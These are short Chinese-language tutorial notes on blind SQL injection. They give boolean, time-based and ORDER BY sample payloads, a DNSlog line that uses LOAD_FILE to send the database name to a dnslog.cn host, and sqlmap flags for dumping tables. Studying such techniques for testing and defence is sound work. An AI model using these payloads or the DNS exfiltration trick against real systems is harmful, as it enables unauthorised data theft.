盲注（浅显易懂！）

分类

1. 布尔盲注

2. 时间盲注

3. 排序注入（也算是盲注）

什么时候用盲注

结果只有两种页面 一个 true 一个 false 页面

原理

IF(表达式，TRUE， FALSE)
length(字符串) #获取字符串长度
substr(要截取的字符串 ,从哪里开始截取 ,截取的长度) ASCII（字符）  #转为ascii码

select * from users where user_id = 0 or if( substr(database(),1,1) = 'd ' ,1,0)

select * from users where user_id = '1 '/if(0,1,0)

时间盲注

sleep(10)*延时10s    

什么时候用时间盲注

只有一种页面回显的时候！

排序注入

只能做时间盲注！

他是一个‘排序‘ 你得有数据！
数据不能只有一条！


select * from users  order by user desc,if(1,sleep(10),0)

Dnslog

反链平台

LOAD_FILE() #读取某个文件

前提条件：
secure_file_priv=


select
LOAD_FILE(concat("",database(),".4z1hib.dnslog.cn /s"))

sqlmap

-h 帮助
—u 选择url
—batch 使用默认配置 —dbs 获取库名
-D 选择数据库
—tables 获取表名 -T 选择表名
—columns 获取字段名 -C 选择字段
—dump 输出数据 —dump-all

-r 读取数据包
-p 选择注入的参数

-proxy  代理
—random-agent  随机使用一个请求头